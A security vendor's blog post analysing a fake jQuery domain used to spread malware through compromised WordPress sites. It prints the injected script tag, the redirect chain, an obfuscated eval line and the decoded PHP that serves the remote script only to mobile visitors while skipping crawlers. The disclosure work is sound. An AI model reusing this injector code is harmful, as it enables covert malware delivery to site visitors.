Careful With Fake jQuery Website – jquery-framework. com

A few days ago we posted in our Labs notes about a Fake jQuery website that is distributing malware. The domain was properly chosen to confuse the end-users ( jquery-framework.com ), since it looks like a valid site.

jquery-framework.com

This is what we were seeing injected on some websites:

<script src="httx://jquery-framework.com/jquery-1.7.1.js..

Some people have even complained to us that we’re flagging jQuery by mistake. However, when you visit that page you see that it does not have the jQuery code, just a redirection to http://browser-31.com/:

window.location = "httx://browser-31.com/s/3013";

Which then redirects the browser to additional malicious domains. This is the full path:


http://browser-31.com/s/3013 -> http://browser-31.com/ -> http://exmobi.org/ ->

http://exmobi.org//?TCFL7295a460c02994eeff6c4089e21d24c4=0064f9c1307b53e92d675b76009102e1

or

http://browser-31.com/s/3013 -> http://4redirect.me/in.cgi?5 -> http://sys-traf.ru/?i=5622 -> 
http://moby-c.ru/?r=10997 -> http://wap-trafik.ru/tb.php

Compromised WordPress sites

Since we initially started seeing this and posted in our Labs, we’re seeing even more websites compromised with it (mostly on outdated WordPress). We had the chance to analyze some of them and they had the following eval code being used to hide the malware (inside the theme files):

eval ("145166141154�50142 .. 141163145�66�64137")

Which when decoded executes the following:

if ((preg_match("/text/vnd.wap.wml|application/vnd.wap.xhtml+xml/si", @$_SERVER["HTTP_ACCEPT'].. ||preg_match('/alcatel|amoi|android|avantgo|blackberry|..
           |iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola
           |nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|
vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || 
       preg_match('/msearch|m?q=/si', @$_SERVER['HTTP_REFERER'])) && 
       !preg_match('/macintosh|america|avant|download|windows-media-player|yandex|google/si', 
@$_SERVER['HTTP_USER_AGENT'])) { echo "<script src="httx://jquery-framework.com/jquery-1.7.1.js"..'; 
flush(); 
exit; }

If you are not familiar with PHP, it will check if you are visiting the site from a mobile phone (ipod, ipad, iphone, etc) and if you are, it inserts the jquery-framework.com code on the site. Since Google (and other AV blacklists) aren’t flagging this domain, users will receive no warning of what is happening.

We’re definitely flagging it, make sure to scan your site for free using Sucuri SiteCheck to make sure you’re good to go.

Scan your website for free:
About Daniel Cid

Daniel B. Cid is the Founder & CTO of Sucuri and also the founder of the open source OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid